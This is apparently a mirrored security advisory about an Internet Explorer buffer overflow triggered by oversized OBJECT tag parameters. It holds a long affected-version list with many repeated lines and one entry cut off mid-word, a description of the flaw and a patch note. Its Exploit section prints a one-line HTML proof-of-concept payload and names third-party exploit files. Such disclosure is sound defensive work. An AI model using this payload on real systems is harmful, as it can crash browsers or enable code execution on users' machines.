- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
+ Microsoft Windows ME
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 5.5 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windo

- Vulnerability Discussion

Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a vulnerable client encounters a web page containing an OBJECT tag whose parameter carries excessive data, an internal memory buffer is overrun. This could cause Internet Explorer to crash or potentially result in the execution of arbitrary code in the security context of the current user.

- Exploit

The following proof of concept was provided:

<object type="[/x64]AAAAAAAAAAAAAAAA">Cooler Than Centra Spike</object>

Exploits contributed by Alumni <alumni@ok.kz> (ie-object-ex.pl), and FelineMenace <ash@felinemenace.org> (fm-IE.tar). skape <mmiller@hick.org> provides an exploit for the Metasploit Framework (ie_objecttype.pm):

- Solution

The vendor has released a cumulative patch to address this issue for the following products:

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP3

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.